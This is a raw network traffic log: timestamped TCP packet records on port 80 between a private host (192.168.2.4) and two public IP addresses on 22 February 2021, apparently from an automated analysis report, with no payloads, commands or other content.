Feb 22, 2021 09:13:34.640615940 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640639067 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.640642881 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640662909 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640680075 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.640681982 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640695095 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640712976 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640728951 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640733004 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.640748978 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640767097 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640769958 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.640784025 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640791893 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.640800953 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640818119 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.640836954 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.641230106 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.642328024 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.642349005 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.642365932 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.642381907 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.642394066 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.642407894 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.642436028 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.692699909 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.741978884 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.794986963 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795038939 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795063019 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795088053 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795118093 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795149088 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795181990 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795212030 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795241117 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795265913 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.795270920 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795300007 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795332909 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795363903 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795398951 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795424938 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.795430899 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795459986 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795489073 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795517921 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795520067 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.795545101 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795576096 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795599937 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.795605898 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795639992 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795670986 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795696020 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.795701981 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.795756102 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.795867920 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.796689034 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.796734095 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.796767950 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.796797991 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.796814919 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.796833992 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.796864033 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.796868086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.796897888 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.796928883 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.796957970 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.796961069 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.796989918 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.796993017 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797024965 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797049999 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.797060013 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797146082 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797156096 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.797168970 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797188997 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797209978 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797230959 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797231913 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.797255039 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797274113 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.797278881 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797297955 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797324896 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.797823906 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797853947 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.797854900 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797878981 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797899008 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797920942 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797940969 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797960997 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797960997 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.797981977 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.797993898 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.798002005 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798027992 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798049927 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798069954 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798089027 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.798135042 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.798144102 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.798719883 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798748016 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798770905 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798791885 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798815012 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798835039 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.798837900 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798867941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798899889 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798918009 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.798923016 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798927069 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.798943043 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798949003 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.798969984 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.798990011 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799015999 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.799099922 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.799683094 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799709082 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799734116 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799756050 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799777031 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799777031 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.799798965 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799818039 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799838066 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.799839973 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799860954 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799869061 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.799886942 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799891949 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.799911022 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799932003 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.799952984 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.800617933 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800642014 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800647020 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.800663948 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800683975 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800704956 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800726891 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800755024 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.800775051 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800803900 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.800812960 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800834894 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800870895 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800889969 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.800893068 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.800914049 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.801057100 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.848579884 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.848613977 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.848634958 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.848653078 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.848669052 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.848690987 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.848710060 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.848721981 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.849770069 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:36.902043104 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:36.954946995 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.049932957 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.049964905 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.049985886 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050007105 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050028086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050030947 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050054073 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050074100 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050077915 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050101042 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050107956 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050122023 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050137997 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050156116 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050173044 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050240040 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050242901 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050266027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050282955 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050288916 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050311089 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050312996 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050333023 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050357103 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050378084 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050380945 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050403118 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050405979 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050425053 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050446033 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050450087 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050467968 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050491095 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.050512075 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.050544024 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.051223040 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.051253080 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.051278114 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.051301003 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.051310062 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.051321983 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.051341057 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.051356077 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.051425934 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.098953962 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.982522964 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.982547998 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.982563972 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.982580900 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.982598066 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:37.982635975 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:37.982841969 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:40.114500046 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:40.114538908 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:40.114562035 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:40.114589930 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:40.114613056 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:40.114737988 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:40.114871025 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:46.746309996 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:46.746359110 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:46.746387959 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:46.746417046 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:46.746443987 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:46.746479988 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:46.746511936 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.102467060 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.102497101 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.102518082 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.102538109 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.102552891 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.102567911 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.102575064 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.131222963 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.131269932 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.131300926 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.131320953 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.131336927 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.131361961 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.131380081 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.131411076 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.131447077 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.131454945 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.131483078 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.131495953 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.162050962 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.162096024 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.162128925 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.162158966 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.162169933 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.162201881 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.162216902 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.162240028 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.162271023 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.162278891 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.162302017 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.162322998 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.192265987 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192293882 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192327023 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192348957 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192369938 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192389965 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192403078 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.192424059 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192446947 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192460060 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.192476988 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192490101 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.192503929 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192517996 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.192534924 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192559004 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192576885 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.192586899 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192600965 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.192627907 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.225274086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225301027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225332022 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225353956 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225362062 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.225410938 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.225425959 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225445032 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225471973 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225478888 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.225502968 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225517988 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225528955 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.225553036 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225574970 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225584030 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.225608110 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225617886 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.225672007 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225684881 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225714922 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:47.225743055 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:47.225783110 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:34.191407919 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.238787889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.238879919 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.239670038 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.286963940 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.394880056 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.394929886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.394963980 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.394996881 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.395004034 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.395030975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.395051956 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.395064116 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.395097971 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.395129919 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.395148039 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.395163059 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.395184040 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.395196915 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.395241022 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.395850897 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.395889997 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.395957947 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.396986008 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.397031069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.397119045 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.398068905 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.398113966 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.398184061 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.399190903 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.399249077 CET	80	49761	172.67.172.17	192.168.2.4
